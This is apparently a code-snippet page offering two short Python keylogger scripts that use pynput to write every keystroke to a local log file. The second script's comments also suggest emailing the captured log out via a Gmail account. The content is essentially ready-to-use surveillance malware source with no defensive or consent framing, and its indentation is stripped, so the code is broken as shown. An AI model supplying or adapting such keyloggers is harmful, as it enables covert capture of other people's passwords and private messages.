Simple Python Keylogger code example
Example 1: python keylogger
import logging
import os
from pynput.keyboard import Listener
log_Directory = os.getcwd() + '/' # where save file
print(os.getcwd()) # directory
# create file
logging.basicConfig(filename=(log_Directory + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
# function in logging
def on_press(key):
logging.info(key)
# when press key save the key in file
with Listener(on_press=on_press) as listener:
listener.join() # infinite cicle
Example 2: keylogger in python
#pip install pynput OR python3 -m pip install pynput
#ONLY ONE MODULE REQUIRED
from pynput.keyboard import Listener #add ", Key" here if you want to be able to act when keys like Enter and esc are pressed)
#you can use the yagmail python module to email yourself the log with a gmail account when a key is pressed (if key.char == ... OR if key=Key.(esc, enter, shift))
file = open("log.txt", "a") #save to the current directory. To save to another location use r'C:\Users\k\t\m\etc\log.txt'
#NOTE - it does not matter if "log.txt" exists or not. Python will automatically create that file.
def on_press(key):
try:
file.write(f'\n{key}')
file.flush() #save changes
except:
pass #ignore all errors
listener = Listener(on_press=on_press) #you can also use "with listener as Listener(on_press...):"
listener.start()
listener.join()